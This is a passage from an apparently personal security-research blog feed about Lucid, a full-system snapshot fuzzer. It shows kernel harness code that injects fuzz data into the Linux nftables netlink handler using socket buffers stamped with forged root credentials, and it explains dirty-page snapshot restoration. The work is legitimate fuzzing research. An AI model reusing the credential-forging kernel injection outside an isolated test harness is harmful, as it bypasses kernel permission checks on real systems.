	<span class="c1">// Pre-set the err as if we failed to find the handler for NETFILTER</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

	<span class="c1">// Check to see if the handler is registered</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nl_table</span><span class="p">[</span><span class="n">NETLINK_NETFILTER</span><span class="p">].</span><span class="n">registered</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab the kernel socket</span>
	<span class="n">kern_sock</span> <span class="o">=</span> <span class="n">netlink_lookup</span><span class="p">(</span><span class="o">&amp;</span><span class="n">init_net</span><span class="p">,</span> <span class="n">NETLINK_NETFILTER</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">kern_sock</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab that .input handler</span>
	<span class="n">handler</span> <span class="o">=</span> <span class="n">nlk_sk</span><span class="p">(</span><span class="n">kern_sock</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">netlink_rcv</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">handler</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Ungrab the table we're done with it</span>
	<span class="n">netlink_table_ungrab</span><span class="p">();</span>

	<span class="c1">// Pre-set</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

	<span class="c1">// Create all of the socket buffers we need and store them</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">alloc_skb</span><span class="p">(</span><span class="n">LF_MAX_ENV_LEN</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
		<span class="c1">// If we failed, unroll all the previous allocations</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">while</span> <span class="p">(</span><span class="o">--</span><span class="n">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">kfree_skb</span><span class="p">(</span><span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
				<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="c1">// Initialize what we need to look legit</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">pkt_type</span> <span class="o">=</span> <span class="n">PACKET_HOST</span><span class="p">;</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">dst_group</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_UID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">gid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_GID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">flags</span> <span class="o">=</span> <span class="n">NETLINK_SKB_DST</span><span class="p">;</span>

		<span class="c1">// Store the skb</span>
		<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">skb</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// We are so done dude, it worked</span>
	<span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="nl">done:</span>
	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Define our input structures</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_envs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="c1">// Creates a socket buffer filled with fuzz message</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">create_fuzz_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span><span class="p">,</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Sanity check</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">idx</span> <span class="o">&gt;=</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">)</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Grab socket buffer from global buf</span>
	<span class="n">skb</span> <span class="o">=</span> <span class="n">skbs</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span>

	<span class="c1">// Set the socket buffer's sock to the kernel sock for Netfilter</span>
	<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>

	<span class="c1">// Inject fuzz data and set sizes</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">skb_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">),</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Dispatches the skb to the appropriate netlink recv handler</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">dispatch_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Create function pointer, msg-&gt;protocol already sane</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rcv</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">handler</span><span class="p">;</span>

	<span class="c1">// Dispatch!</span>
	<span class="n">rcv</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Main input processing logic</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_handle_input</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="n">input</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">fuzz_skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">remaining</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_handle_input</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/** LUCID TAKES SNAPSHOT HERE **/</span>
	<span class="c1">// This special NOP instruction, when interpreted by Bochs will cause</span>
	<span class="c1">// Bochs to save a snapshot of its state to disk that Lucid will be able</span>
	<span class="c1">// to resume in its purpose-built version of Bochs called `lucid_bochs`</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

	<span class="c1">// Make sure we have enough bytes to construct the input metadata</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span><span class="p">))</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Cast the data to our metadata struct</span>
	<span class="n">input</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="p">)</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">;</span>

	<span class="c1">// Sanity check the values</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">!=</span> <span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Sanity check the number of messages</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span> <span class="o">&gt;</span> <span class="n">LF_MAX_NUM_ENVS</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Check how many remaining bytes we have, and subtract what we already</span>
	<span class="c1">// consumed with the input metadata</span>
	<span class="n">remaining</span> <span class="o">=</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span><span class="p">;</span>
	<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Start tracking an offset into the byte buffer where we're reading from</span>
	<span class="n">offset</span> <span class="o">=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Iterate through the envelopes and parse each one</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// Make sure we have enough data remaining to parse an envelope metadata</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We can at least read the length field, and sanity check it</span>
		<span class="n">env</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="p">)(</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_ENV_LEN</span> <span class="o">||</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Consume those bytes</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">;</span>

		<span class="c1">// Make sure we can read that much data</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We have enough data left, create the skb for this envelope</span>
		<span class="n">fuzz_skb</span> <span class="o">=</span> <span class="n">create_fuzz_skb</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fuzz_skb</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Dispatch the fuzz_skb to nftables!</span>
		<span class="n">dispatch_skb</span><span class="p">(</span><span class="n">fuzz_skb</span><span class="p">);</span>

		<span class="c1">// Update our offset</span>
		<span class="n">offset</span> <span class="o">+=</span> <span class="p">(</span><span class="n">LF_ENV_HDR_SIZE</span> <span class="o">+</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

		<span class="c1">// Update remaining</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Done parsing envelopes, check if we have remaining bytes</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="cm">/** LUCID RESTORES SNAPSHOT **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

	<span class="c1">// Finally done</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cleanup resources from lf_init(), not used when fuzzing but good for harness</span>
<span class="c1">// dev/testing</span>
<span class="kt">void</span> <span class="nf">lucid_fuzz_cleanup</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">kfree_skb</span><span class="p">(</span><span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
		<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// NULL the globals</span>
	<span class="n">kern_sock</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">handler</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Set input size to 0</span>
	<span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Linux" /><category term="Kernel" /><category term="Nftables" /><summary type="html"><![CDATA[Background Last episode on the blog we took a shallow and broad approach to fuzzing several Netlink-plumbed subsystems like Netfilter, Route, Crypto, and Xfrm. This endeavor wasn’t necessarily an earnest bug finding mission since we mostly wanted to just see how fuzzing a real target with Lucid would go and what things would need tweaking. We ended up changing quite a bit of the core-fuzzer features, specifically Redqueen issues, and were able to improve the fuzzer quite a bit. We modularized the mutator component of Lucid so now writing your own fuzzer for Lucid is as simple as implementing your own mutator. We can extend this even more, and will, by enabling the user to pass command line arguments directly to the bespoke mutator.]]></summary></entry><entry><title type="html">Lucid Dreams I: Lucid’s First Time Fuzzing</title><link href="https://h0mbre.github.io/Lucid_Dreams_1/" rel="alternate" type="text/html" title="Lucid Dreams I: Lucid’s First Time Fuzzing" /><published>2025-10-04T00:00:00+00:00</published><updated>2025-10-04T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Dreams_1</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Dreams_1/"><![CDATA[<h2 id="background">Background</h2>
<p>We’ve spent a lot of time so far on this blog documenting the development process of Lucid, our full-system snapshot fuzzer, and I really wanted to start using it to do some real fuzzing. So the focus of this blog post will be documenting the process I had to take to get Lucid up and fuzzing on a real target. So far, Lucid has only worked on a toy harness/example, and so we need to see what kind of things need tweaking when a real target comes into play.</p>

<h2 id="off-blog-snapshot-dev">Off-Blog Snapshot Dev</h2>
<p>Since the last post, the biggest change has been the way we do snapshots. I found that on the simple development target, a really tight fuzzing loop, the scaling factor for the old snapshot method deteriorated quickly.</p>

<h3 id="old-snapshot-method-revisited">Old Snapshot Method Revisited</h3>
<p>If you remember, the fuzzer works by loading a <code class="language-plaintext highlighter-rouge">static-pie</code> ELF image of the Bochs x86 emulator into the fuzzer process and context switching between the now sandboxed emulator that runs our target and our fuzzer which does all the fuzzy things. Because we load and sandbox Bochs, we know the location of every memory segment in the image that is writable, as well as where the dynamic memory is, because we don’t allow Bochs to interface with the OS to allocate memory; the fuzzer handles that. So what we did was map the writable memory segments such that they were all contiguous in memory. Then when we take a snapshot of Bochs, all we have to do is capture that memory state and save it off. We did that, and we saved the memory as a memory-backed file. On Linux, snapshot restoration then becomes very simple: we just <code class="language-plaintext highlighter-rouge">mmap</code> that memory-backed file back over the top of the contiguous writable memory region. One single syscall to restore memory. We did this mainly because it was very simple. Well, it turns out that when you ask the kernel to invalidate, destroy, and overwrite billions of bytes worth of pages thousands of times per second, it scales poorly. I’m embarrassed to admit that I don’t quite remember what the bottleneck was, but I seem to remember that the <code class="language-plaintext highlighter-rouge">mmap</code> requests needed some sort of serialization and were spending most of their CPU time destroying the dirtied memory backing pages. My scaling factor went into the toilet once I brought up the 8 cores I have on my devbox. So I had to find another way to do this, likely one that didn’t depend on restoring <em>all</em> writable memory each iteration, but instead differentially reset only the dirty memory in Bochs.</p>

<h3 id="new-strategy-for-linear-scaling">New Strategy for Linear Scaling</h3>
<p>We want to be able to scale Lucid linearly as we bring more cores online for fuzzing, so we want our scaling factor to be one-to-one with the number of cores being used. 100 cores should bring us a 100x speed-up over single-core fuzzing. So we need a way to differentially restore only the dirty memory and not all writable memory. We also want to strive for a method that doesn’t invoke the kernel via syscall, because that’s how you bottleneck across cores. The way I decided to do this is not novel and I didn’t invent it; it’s actually similar to the way a lot of fuzzers get coverage feedback on black-box targets.</p>

<p>What I ended up doing is marking all of the writable pages that we load for Bochs as having no write permissions (strictly <code class="language-plaintext highlighter-rouge">PROT_READ</code>). This way, when Bochs tries to write to a page, it will cause a page fault. On Linux, your process gets a signal delivered whenever this happens and you can register a function to handle it. So I patched Bochs to handle these page faults, and in the signal handler Bochs marks the faulting page as dirty in a data structure that both Bochs and Lucid have access to. So now we’ve logged a page that was dirtied; we then make that page permanently writable and restore it on every snapshot reset from then on. This design boils snapshot restoration down to a series of <code class="language-plaintext highlighter-rouge">memcpy</code> calls from the snapshot memory to the dirty memory. Now we’ve achieved differential restoration and everything is done purely in userspace via <code class="language-plaintext highlighter-rouge">memcpy</code>; no syscalls are invoked in the hot path to restore the snapshot. This seems to scale well, and we’re pretty close to the one-to-one scaling factor we’re after. The fuzzers spend 100% of their time in userland when they’re executing the hot fuzzing loops.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+----------------------------------------------+
| [1] Fuzzcase Begins                          |&lt;---------------+
| Lucid starts executing target code in Bochs. |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [2] Bochs Writes to Page                     |                |
| Attempted write -&gt; page is PROT_READ only.   |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [3] Page Fault Handler                       |                |
| Fault occurs -&gt; handler adds page to dirty   |                |
| list and sets protection to PROT_WRITE.      |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [4] Fuzzcase Ends                            |                |
| Execution completes                          |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [5] Snapshot Restore                         |                |
| Lucid iterates dirty list -&gt; memcpy snapshot |                |
| contents back into those pages.              |----------------+
| (No syscalls, all user-space.)               |
+----------------------------------------------+
</code></pre></div></div>
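
<p>The loop above can be sketched in a few dozen lines of C. This is a minimal, single-threaded illustration and not Lucid’s or Bochs’ actual code: the names <code class="language-plaintext highlighter-rouge">tracker_init</code>, <code class="language-plaintext highlighter-rouge">tracker_restore</code>, and <code class="language-plaintext highlighter-rouge">on_fault</code>, along with the <code class="language-plaintext highlighter-rouge">MAX_DIRTY</code> cap, are made up for the example. It assumes Linux, where calling <code class="language-plaintext highlighter-rouge">mprotect</code> from a <code class="language-plaintext highlighter-rouge">SIGSEGV</code> handler works in practice.</p>

```c
#define _GNU_SOURCE
#include <signal.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define MAX_DIRTY 1024 // hypothetical cap on tracked pages

static uint8_t *g_region;   // "guest" memory, mapped PROT_READ after init
static uint8_t *g_snapshot; // pristine copy taken at snapshot time
static size_t g_region_len;
static size_t g_page_size;
static volatile uintptr_t g_dirty[MAX_DIRTY]; // page addresses that faulted
static volatile size_t g_num_dirty;

// SIGSEGV handler: log the faulting page, then make it writable for good
static void on_fault(int sig, siginfo_t *info, void *ctx) {
	uintptr_t addr = (uintptr_t)info->si_addr;
	uintptr_t base = (uintptr_t)g_region;
	uintptr_t page = addr & ~((uintptr_t)g_page_size - 1);
	(void)sig;
	(void)ctx;

	// A fault outside our region (or a full list) is treated as a real crash
	if (addr < base || addr >= base + g_region_len || g_num_dirty == MAX_DIRTY)
		_exit(1);

	g_dirty[g_num_dirty] = page;
	g_num_dirty++;
	mprotect((void *)page, g_page_size, PROT_READ | PROT_WRITE);
}

// Map the region, fill it, take the snapshot, then drop write permission
int tracker_init(size_t num_pages) {
	struct sigaction sa;

	g_page_size = (size_t)sysconf(_SC_PAGESIZE);
	g_region_len = num_pages * g_page_size;
	g_region = mmap(NULL, g_region_len, PROT_READ | PROT_WRITE,
			MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	g_snapshot = mmap(NULL, g_region_len, PROT_READ | PROT_WRITE,
			  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (g_region == MAP_FAILED || g_snapshot == MAP_FAILED)
		return -1;

	memset(g_region, 0x41, g_region_len);
	memcpy(g_snapshot, g_region, g_region_len);

	memset(&sa, 0, sizeof(sa));
	sa.sa_sigaction = on_fault;
	sa.sa_flags = SA_SIGINFO;
	sigemptyset(&sa.sa_mask);
	if (sigaction(SIGSEGV, &sa, NULL))
		return -1;

	return mprotect(g_region, g_region_len, PROT_READ);
}

// Restore only the pages that were dirtied; no syscalls on this path
void tracker_restore(void) {
	for (size_t i = 0; i < g_num_dirty; i++) {
		size_t off = g_dirty[i] - (uintptr_t)g_region;
		memcpy(g_region + off, g_snapshot + off, g_page_size);
	}
}
```

<p>Note that the dirty list is never cleared in this sketch: once a page has faulted it stays writable and gets copied back on every reset, which matches the description above. The only syscall left is the one-time <code class="language-plaintext highlighter-rouge">mprotect</code> per page inside the fault handler.</p>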

<h3 id="redqueen-for-compare-solving">Redqueen for Compare Solving</h3>
<p>I was also able to implement Redqueen by instrumenting compare instructions in Bochs. We’ll get into Redqueen in more detail below when we enable compare coverage in our fuzzing experiment and try to determine how helpful it is for this specific target.</p>

<h2 id="harness-development">Harness Development</h2>
<p>With that out of the way, we need something to fuzz! For this, I wanted to do something very broad and shallow, so I homed in on Linux kernel subsystems that are accessible via Netlink. Netlink is a network/communication protocol that allows userspace to communicate with the kernel over sockets, vs. something like a driver or a syscall. A lot of the bugs that have been exploited in public over the last 5 years have been bugs in subsystems that have Netlink plumbing, things like netfilter, the packet scheduler, etc. Because these subsystems are designed to just receive bytes of Netlink buffer data, I thought this would be a great first thing to get fuzzing on.</p>

<p>Since we want to fuzz multiple subsystems (broad, shallow), we first have to figure out how Netlink communications normally function. The typical workflow of a userspace program or utility that wants to communicate with the kernel over Netlink is to open a Netlink socket for a specific Netlink protocol. The harness uses the following protocols: <code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code>, <code class="language-plaintext highlighter-rouge">NETLINK_XFRM</code>, <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>, and <code class="language-plaintext highlighter-rouge">NETLINK_CRYPTO</code>. For example:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">socket</span><span class="p">(</span><span class="n">AF_NETLINK</span><span class="p">,</span> <span class="n">SOCK_RAW</span><span class="p">,</span> <span class="n">NETLINK_NETFILTER</span><span class="p">)</span>
</code></pre></div></div>

<p>When the userspace program sends data to the Netlink socket that has a protocol associated with it, we end up in <a href="https://elixir.bootlin.com/linux/v6.17/source/net/netlink/af_netlink.c#L1814"><code class="language-plaintext highlighter-rouge">netlink_sendmsg</code></a>. This function’s job is basically to create an appropriately initialized <code class="language-plaintext highlighter-rouge">struct sk_buff</code> that wraps the user’s data that was sent via the <code class="language-plaintext highlighter-rouge">sendmsg</code> syscall. This socket buffer is then dispatched to the appropriate handler (in the example, the handler for NETFILTER would be <a href="https://elixir.bootlin.com/linux/v6.17/source/net/netfilter/nfnetlink.c#L650"><code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code></a>).</p>
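
<p>For reference, here is a rough sketch of what the userspace side puts into the buffer before it ever reaches <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code>. It only uses the standard definitions from <code class="language-plaintext highlighter-rouge">linux/netlink.h</code>; the helper name <code class="language-plaintext highlighter-rouge">build_nlmsg</code> is hypothetical, and the message type passed in is a placeholder rather than a real nfnetlink message type.</p>

```c
#include <linux/netlink.h>
#include <stdint.h>
#include <string.h>

// Fill `buf` with a single Netlink message carrying `payload`.
// `buf` must be 4-byte aligned. Returns the aligned number of bytes used,
// or 0 if the message does not fit in `cap` bytes.
uint32_t build_nlmsg(void *buf, uint32_t cap, uint16_t type,
		     const void *payload, uint32_t len) {
	struct nlmsghdr *nlh = buf;

	// NLMSG_SPACE() is the header plus payload, rounded up to 4 bytes
	if (len > cap || NLMSG_SPACE(len) > cap)
		return 0;

	memset(buf, 0, NLMSG_SPACE(len));
	nlh->nlmsg_len = NLMSG_LENGTH(len); // header + unpadded payload
	nlh->nlmsg_type = type;             // placeholder, subsystem specific
	nlh->nlmsg_flags = NLM_F_REQUEST;
	nlh->nlmsg_seq = 1;
	nlh->nlmsg_pid = 0;                 // let the kernel fill in our port id
	memcpy(NLMSG_DATA(nlh), payload, len);

	return NLMSG_SPACE(len);
}
```

<p>A program would then hand the resulting bytes to <code class="language-plaintext highlighter-rouge">send</code> or <code class="language-plaintext highlighter-rouge">sendmsg</code> on the socket from the earlier example, and the kernel would wrap them in a socket buffer as described above.</p>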

<p>So what I want to do is skip any userspace to kernel context switching in our harness and just inject our fuzzing inputs directly into kernel space to be dispatched to the appropriate handlers. So I ended up structuring the fuzzing input as a series of what I’m calling “messages” and each “message” is its own Netlink message for a random protocol that we’re fuzzing. I settled arbitrarily on fuzzing inputs maxing out at 16 messages, so we can randomly send any number of messages per input up to 16. In the fuzzing harness, we use these data structures to create a fuzzing input:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// An input structure</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_msgs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="c1">// A message structure</span>
<span class="k">struct</span> <span class="n">lf_msg</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">protocol</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">msg_len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>
</code></pre></div></div>
